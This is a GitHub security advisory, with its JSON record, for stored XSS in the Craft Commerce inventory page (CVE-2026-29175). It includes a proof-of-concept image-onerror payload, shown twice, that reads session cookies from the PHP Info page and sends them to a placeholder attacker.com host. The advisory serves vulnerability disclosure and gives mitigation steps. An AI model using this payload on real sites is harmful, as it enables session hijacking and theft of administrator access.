GHSA-CFPV-RMPF-F624

Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:55
VLAI?
Summary
Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking
Details

Summary

Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page.

This vulnerability enables session hijacking by fetching the PHP Info utility page, which displays unmasked session cookies. Unlike other XSS chains that require elevated sessions, this attack provides instant access to the victim’s session - no additional user interaction or elevated session approval required.

Proof of Concept

Permissions Required

  • Access the control panel
  • Access Craft Commerce
  • Create/Edit products

Steps to Reproduce

  1. Log in to the control panel
  2. Navigate to Commerce → Products
  3. Add a new product and set the Title field to: (replace https://attacker.com) html <img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(t=>{m=t.match(/<th[^>]*>Cookie[^<]*<\/th>\s*<td[^>]*>([\s\S]*?)<\/td>/);if(m)new Image().src='https://attacker.com/s?c='+btoa(m[1])})">
  4. Save the product
  5. Navigate to Commerce → Inventory (/admin/commerce/inventory)
  6. XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server

Cookie Extraction Details

The PHP Info page (/admin/utilities/php-info) displays cookie values (unmasked) in multiple locations: - HTTP_COOKIE - Cookie (used in this PoC) - $_SERVER['HTTP_COOKIE'] - $_COOKIE['<cookie-name>']

Notes

  • The same vulnerability exists in Variant Title and Variant SKU fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields.
  • $_COOKIE['CRAFT_CSRF_TOKEN'] is masked in PHP Info, but the unmasked value is available in the other parameters listed above.
  • This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session.

Mitigation

  1. Sanitize product and variant fields when rendering in the inventory template
  2. Mask sensitive cookie values in the PHP Info utility page (similar to how CRAFT_CSRF_TOKEN, CRAFT_SECURITY_KEY, and CRAFT_DB_PASSWORD are already masked)
Severity ?
8.6 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29175"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:23:42Z",
    "nvd_published_at": "2026-03-10T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nStored XSS vulnerabilities exist in the Commerce Inventory page. The **Product Title**, **Variant Title**, and **Variant SKU** fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page.\n\nThis vulnerability enables **session hijacking** by fetching the PHP Info utility page, which displays unmasked session cookies. Unlike other XSS chains that require elevated sessions, this attack provides instant access to the victim\u2019s session - no additional user interaction or elevated session approval required.\n\n## Proof of Concept\n\n### Permissions Required\n\n- Access the control panel\n- Access Craft Commerce\n- Create/Edit products\n\n### Steps to Reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce \u2192 Products**\n3. Add a new product and set the **Title** field to: (replace `https://attacker.com`)\n    ```html\n    \u003cimg src=x onerror=\"fetch(\u0027/admin/utilities/php-info\u0027).then(r=\u003er.text()).then(t=\u003e{m=t.match(/\u003cth[^\u003e]*\u003eCookie[^\u003c]*\u003c\\/th\u003e\\s*\u003ctd[^\u003e]*\u003e([\\s\\S]*?)\u003c\\/td\u003e/);if(m)new Image().src=\u0027https://attacker.com/s?c=\u0027+btoa(m[1])})\"\u003e\n    ```\n4. Save the product\n5. Navigate to **Commerce \u2192 Inventory** (`/admin/commerce/inventory`)\n6. XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server\n\n### Cookie Extraction Details\nThe PHP Info page (`/admin/utilities/php-info`) displays cookie values (unmasked) in multiple locations:\n- `HTTP_COOKIE`\n- `Cookie` (used in this PoC)\n- `$_SERVER[\u0027HTTP_COOKIE\u0027]`\n- `$_COOKIE[\u0027\u003ccookie-name\u003e\u0027]`\n\n### Notes\n- The same vulnerability exists in **Variant Title** and **Variant SKU** fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields.\n- `$_COOKIE[\u0027CRAFT_CSRF_TOKEN\u0027]` is masked in PHP Info, but the unmasked value is available in the other parameters listed above.\n- This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session.\n\n## Mitigation\n1. Sanitize product and variant fields when rendering in the inventory template\n2. Mask sensitive cookie values in the PHP Info utility page (similar to how `CRAFT_CSRF_TOKEN`, `CRAFT_SECURITY_KEY`, and `CRAFT_DB_PASSWORD` are already masked)",
  "id": "GHSA-cfpv-rmpf-f624",
  "modified": "2026-03-10T22:55:20Z",
  "published": "2026-03-10T18:23:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-cfpv-rmpf-f624"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29175"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/9f0638a4fb29ed8295a463385a7cc49ec986e33a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.